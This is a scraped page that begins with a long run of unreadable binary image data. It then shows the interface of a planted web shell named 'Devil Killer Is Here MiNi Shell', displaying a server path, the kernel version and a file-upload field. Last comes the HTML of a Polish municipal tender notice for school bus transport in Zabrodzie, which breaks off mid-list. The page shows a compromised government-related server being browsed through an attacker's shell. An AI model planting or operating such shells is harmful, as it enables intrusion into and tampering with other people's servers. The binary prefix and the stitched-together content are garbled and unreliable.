JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250603/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250603/0026112601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Dowożenie uczniów do szkół na terenie Gminy Zabrodzie wraz z zapewnieniem opieki.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Zabrodzie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 550667988</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Władysława Stanisława Reymonta</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zabrodzie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@zabrodzie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://zabrodzie.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dowożenie uczniów do szkół na terenie Gminy Zabrodzie wraz z zapewnieniem opieki.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ae5947f3-70c8-4652-8b49-307cef8eb6b4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00261126</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00042836/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 „Dowożenie uczniów do szkół na terenie Gminy Zabrodzie wraz z zapewnieniem opieki.”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ae5947f3-70c8-4652-8b49-307cef8eb6b4 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania opisane w punkcie 9.<br/>Informacja o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami, oraz<br/>informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz. Urz. UE.L. 2016.119.1), dalej RODO, informuję o zasadach przetwarzania Pani/Pana danych osobowych oraz o przysługujących Pani/Panu prawach z tym związanych.<br/>1. Administratorem przetwarzającym Pani/Pana dane osobowe jest Wójt Gminy Zabrodzie , z siedzibą przy ul. Wł. St. Reymonta 51, 07-230 Zabrodzie.<br/>2. W Urzędzie Gminy w Zabrodziu wyznaczony został Inspektor Ochrony Danych, kontakt e-mail: ochronadanych@zabrodzie.pl<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) w/w Rozporządzenia mającego na celu wypełnienie obowiązku w zakresie sprawowania władzy publicznej, ciążącego na administratorze w celu związanym z postępowaniem o udzielenie zamówienia publicznego „Dowożenie uczniów do szkół na terenie Gminy Zabrodzie wraz z zapewnieniem opieki.”<br/> prowadzonym w trybie art. 275 pkt1 ustawy z dnia 11 września 2019r. Prawo Zamówień Publicznych (Dz. U. z 2024r. poz. 1320 ze zm.) nr postępowania RG.271.5.2022.<br/>4. Odbiorcą Pani/Pana danych osobowych są podmioty uprawnione na podstawie przepisów prawa oraz osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Prawo zamówień publicznych. <br/>5. Dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 97 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6. Przysługuje Pani/Panu, w zależności od charakteru przetwarzania prawo dostępu do danych osobowych Pani/Pana dotyczących na podstawie art. 15 RODO, na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*, na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO**, prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych- ul. Stawki 2, 00-193 Warszawa.<br/> Nie przysługuje Pani/Panu w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>7. Podanie przez Panią/Pana danych osobowych jest wymogiem ustawowym w celu realizacji zadań, o których mowa w pkt 3. Jest Pani/Pan zobowiązany do ich podania, a konsekwencją niepodania danych osobowych będzie zastosowanie sankcji, określonych w przepisach prawa.<br/>8. Przetwarzanie podanych przez Panią/Pana danych osobowych nie będzie podlegało zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu, o którym mowa w art. 22 ust. 1 i 4 Rozporządzenia.<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.271.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: usługa polegająca na dowozie uczniów z miejscowości położonych na terenie Gminy Zabrodzie do niżej wymienionych placówek oświatowych zlokalizowanych na terenie Gminy Zabrodzie oraz odwóz po zajęciach na podstawie zakupionych biletów miesięcznych w roku szkolnym 2025/2026 oraz 2026/2027.<br/>- Zespół Szkolno – Przedszkolny w Zabrodziu- adres szkoły: Zabrodzie ul. Szkolna 3<br/>- Zespół Szkolno – Przedszkolny w Adelinie – adres szkoły: Zabrodzie ul. Wł.St.Reymonta 47<br/>2. Zapewnienie opiekunów leży po stronie Wykonawcy.<br/>3. Zamawiający nie ponosi żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała lub śmierć czy szkoda materialna spowodowana działalnością Wykonawcy.<br/>4. Przewóz będzie polegał na zabieraniu uczniów z wyznaczonych przystanków na określonych trasach i ich przewóz do placówek oświatowych na określoną godzinę i z powrotem. Uczeń musi zostać dowieziony najwcześniej 30 minut przed rozpoczęciem zajęć (rozpoczęcie zajęć w: Zespole Szkolno – Przedszkolnym w Zabrodziu godz. 8:00, Zespole Szkolno – Przedszkolny w Adelinie godz. 8:55) i odwieziony nie później niż 2 godziny po zakończeniu zajęć. <br/>5. Wykonawca zobowiązany będzie do sprzedaży biletów miesięcznych oddzielnie na każdy miesiąc wg przekazanej listy uczniów. <br/>6. Usługa przewozu osób realizowana będzie na trasach obejmujących miejscowości, z których dojeżdżają uczniowie z wyznaczonych przystanków do placówek oświatowych na terenie Gminy Zabrodzie z powrotem we wszystkie dni nauki szkolnej, zgodnie z kalendarzem roku szkolnego 2025/2026 oraz 2026/2027. Usługa będzie świadczona w dni nauki szkolnej.Wykonawca zobowiązany jest również zapewnić transport w dni, w które uczniowie będą odrabiali inne dni zwolnione z nauki szkolnej.<br/>8. Usługa nie będzie świadczona w sytuacji zamknięcia placówek oświatowych zlokalizowanych na terenie Gminy Zabrodzie z powodów epidemiologicznych bądź innych powodów, w wyniku których zajęcia dydaktyczne i wychowawcze będą odbywały się za pośrednictwem środków porozumiewania się na odległość.<br/>9. Zamawiający dopuszcza aby Wykonawca wykonywał przewóz uczniów autobusami kursowymi<br/>w komunikacji regularnej ogólnodostępnej – jako publiczny przewóz osób, zgodnie z obowiązującym<br/>go rozkładem jazdy podanym do publicznej wiadomości na przystankach autobusowych. Wykonawca zapewni wykwalifikowanych i posiadających odpowiednie kwalifikacje i dokumenty kierowców.<br/>10. Usługa świadczona będzie taborem Wykonawcy. <br/>11. Wykonawca zobowiązany jest dostosować do zamówienia odpowiednią liczbę środków transportu w celu realizacji przewozów (minimum 2 autobusy) zgodnie z rozkładem jazdy i ilością zakupionych biletów miesięcznych. Wykonawca powinien posiadać pojazdy, które zapewnią prawidłowe wykonanie zamówienia – dysponować autobusami o ilości zapewniającej przewóz przewidywanej liczby uczniów na poszczególnych trasach z zapewnieniem miejsc siedzących dla tych uczniów.<br/>Przewidywany rozkład tras dowozu przed lekcjami:<br/>Lp.	Trasa przejazdu	Przewidywana liczba uczniów<br/>1.	ZSP Zabrodzie ul. Szkolna 3- Adelin (wieś)- Adelin (Mostek)- Mościska – Obrąb- Kiciny- Choszczowe- ZSP Adelin (z siedzibą ul. Wł.St.Reymonta 47)	Ok.35<br/>2. ZSP Zabrodzie ul. Szkolna 3– Mostówka – Anastazew (Krzyż) – Anastazew (Dom Kultury)- Anastazew (Zakręt) – Podgać (Sołtys) – Basinów (Kukawki)- Basinów (Krzyż) – Basinów (Pałki) – Płatków (Sklep) – Płatków (Piaskowa) – Kiciny (Krzyżówki) – Choszczowe (Wieś)- Choszczowe (Struga) – ZSP Adelin (z siedzibą <br/>ul. Wł.St.Reymonta 47)	Ok.25<br/>3.	ZSP Adelin (siedzibą ul. Wł.St.Reymonta 47) - Mostówka- ZSP Adelin (z siedzibą ul. Wł.St.Reymonta 47)	Ok.30<br/>4.	Słopsk ul.Kolonijna i Ignacówka-Słopsk (Przy Strumyku) –Słopsk (Rondo) – Słopsk ul. Żołnierska– Słopsk (Remiza)- Słopsk (Jagodowa)- Niegów (Żurawia) – Niegów (Blok)- ZSP Zabrodzie ul. Szkolna 3	Ok. 63<br/>5.	ZSP Zabrodzie ul. Szkolna 3– Gaj (Fiszor) – Gaj (Wieś) – Mostówka – ZSP Zabrodzie ul. Szkolna 3	Ok.53<br/>6.	Młynarze (Wieś)- Młynarze (Most)- Głuchy (za wiaduktem)- Głuchy (Trakt Napoleoński) – Wysychy (Wieś)- Wysychy (Łączna)- ZSP Zabrodzie ul. Szkolna 3	Ok.51<br/><br/>Przewidywany projekt odwozu:<br/>Lp.	Trasa Przejazdu <br/>	Po lekcji:<br/> (ok.257 dzieci)<br/>1.	ZSP Adelin (z siedzibą ul. Wł.St.Reymonta 47)- Adelin (Grzegorzewo)-Adelin (Wieś)- Adelin (Mostek)- Mościska (Szkoła)- Obrąb- Kiciny (Szkoła)- Choszczowe- Choszczowe (Wieś)- Choszczowe (Struga)- Mostówka (Kościół)- Mostówka (Sklep)- Anastazew- Anastazew (Krzyż)- Anastazew (Dom Kultury)- Anastazew (Zakręt)- Pogdać (Wieś)- Pogdać (Las)- Pogdać (Sołtys)- Basinów (Kukawki)- Basinów (Krzyż)- Basinów (Pałki)- Płatków (Sklep)- Płatków (Piaskowa)- ZSP Adelin (z siedzibą ul. Wł.St.Reymonta 47)	Po 5 lekcji (ok.13:40)<br/>2.	ZSP Adelin (z siedzibą ul. Wł.St.Reymonta 47)- Adelin (Grzegorzewo)-Adelin (Wieś)- Adelin (Mostek)- Mościska (Szkoła)- Obrąb- Kiciny (Szkoła)- Choszczowe- Choszczowe (Wieś)- Choszczowe (Struga)- Mostówka (Kościół)- Mostówka (Sklep)- Anastazew- Anastazew (Krzyż)- Anastazew (Dom Kultury)- Anastazew (Zakręt)- Pogdać (Wieś)- Pogdać (Las)- Pogdać (Sołtys)- Basinów (Kukawki)- Basinów (Krzyż)- Basinów (Pałki)- Płatków (Sklep)- Płatków (Piaskowa)	Po 7 lekcji (ok.15:30)<br/>3.	ZSP Zabrodzie ul. Szkolna 3 - Mostówka – Gaj- Fiszor- Niegów – Słopsk- ZSP Zabrodzie ul. Szkolna 3	Po 4 lekcji (ok.11:50)<br/>4.	ZSP Zabrodzie ul. Szkolna 3 - Mostówka – Gaj Fiszor- ZSP Zabrodzie ul. Szkolna 3	Po 5 lekcji (ok.12:45)<br/>5.	ZSP Zabrodzie ul. Szkolna 3 - Niegów- Słopsk- Młynarze- ZSP Zabrodzie ul. Szkolna 3	Ok. 13:00<br/>6.	ZSP Zabrodzie ul. Szkolna 3- Wysychy- Głuchy- ZSP Zabrodzie ul. Szkolna 3	Po 6 lekcji (ok.13:40)<br/>7.	ZSP Zabrodzie ul. Szkolna 3 - Gaj- Fiszor- Słopsk- Młynarze- ZSP Zabrodzie ul. Szkolna 3	Po 7 lekcji (ok.14:25)<br/>8.	ZSP Zabrodzie ul. Szkolna 3 - Pozostali uczniowie <br/>w zależności od zajęć	Po 8 lekcji (ok. 15:30)<br/><br/>Łączna długość tras wynosi ok 6000 km miesięcznie.<br/> <br/>Szczegółowy wykaz linii oraz rozkłady jazdy zostaną uzgodnione z wybranym Wykonawcą. Istnieje możliwość łączenia tras.<br/><br/>12. Liczba uczniów na poszczególnych trasach jest liczbą, która może ulec zmianie w trakcie trwania umowy,na co Wykonawca musi być przygotowany. W przypadku zmiany liczby uczniów wynagrodzenie Wykonawcy wynikać będzie z faktycznej ilości zakupionych biletów miesięcznych. <br/>13. Zamawiający zastrzega sobie prawo zmiany tras przewozu dzieci, ilości przewozów w tygodniu, terminów ich wykonywania oraz liczby dzieci, ze względu na okoliczności, których strony nie mogły przewidzieć w chwili zawarcia umowy, a podyktowane potrzebami zamawiającego wynikającymi z realizacji obowiązku zapewnienia uczniom dowozu do szkoły.<br/>14. Wykonawca zobowiązany będzie do punktualnego wykonywania usługi, posiadania taboru zastępczego<br/>w przypadku awarii wskazanego pojazdu. W przypadku awarii jednego z pojazdów Wykonawca zobowiązany jest podstawić niezwłocznie pojazd zastępczy nie gorszy od wskazanego w ofercie.<br/>15. Wykonawca zobowiązany będzie do wykonywania usługi sprawnymi technicznie pojazdami posiadającymi aktualne badania techniczne. Ponadto Wykonawca będzie dbał o czystość oraz o właściwy stan techniczny pojazdów zapewniający odpowiedni komfort jazdy.<br/>16. Wykonawca zobowiązany będzie wykonywać zamówienie zgodnie z zasadami i obowiązkami wynikającymi z ustawy z dnia 6 września 2001 roku o transporcie drogowym oraz ustawy z dnia 20 czerwca 1997 roku Prawo o ruchu drogowym. Przedmiot niniejszego zamówienia musi być wykonany zgodnie z innymi aktualnie obowiązującymi przepisami prawa w zakresie obowiązującym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-09-01 do 2027-06-25</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rok produkcji autobusu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający na podstawie art. 112 ustawy określa warunki udziału w postępowaniu dotyczące: zdolności technicznej lub zawodowej. Wykonawca spełni warunki, jeżeli wykaże, że:<br/>a)	w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada aktualne zezwolenie na wykonywanie zawodu przewoźnika drogowego zgodnie z ustawą z dnia 6 września 2001 roku o transporcie drogowym (lub inny równoważny dokument (licencję) zezwalający na wykonywanie krajowego transportu drogowego osób.<br/>b)	w zakresie potencjału technicznego – zamawiający uzna warunek za spełniony jeżeli Wykonawca, wykaże, że posiada do dyspozycji przynajmniej dwa autobusy o liczbie miejsc siedzących minimum 50 (należy załączyć dokument potwierdzający spełnienie tego warunku i wskazać, które autobusy potwierdzają spełnienie warunku) oraz muszą być nie starsze niż z roku 2010.<br/>c) w zakresie potencjału zawodowego - zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje dwoma kierowcami, spełniającymi wymagania określone w przepisach ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (tj. Dz. U. z 2022 r. poz.988 z późm. zm.) określającym wymagania w stosunku do kierowców.<br/>2.	Wykonawcy na podstawie art. 58 ustawy mogą wspólnie ubiegać się o udzielenie zamówienia (np. spółka cywilna, konsorcjum).<br/>3.	Wykonawca na zasadach opisanych w art. 118-123 ustawy może w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w ust. 1 w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby (potencjał podmiotu trzeciego), niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>4.	Zamawiający informuje, iż „stosowna sytuacja”, o której mowa w ust. 3 wystąpi wyłącznie w przypadku kiedy:<br/>1)	wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, złoży wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów;<br/>2)	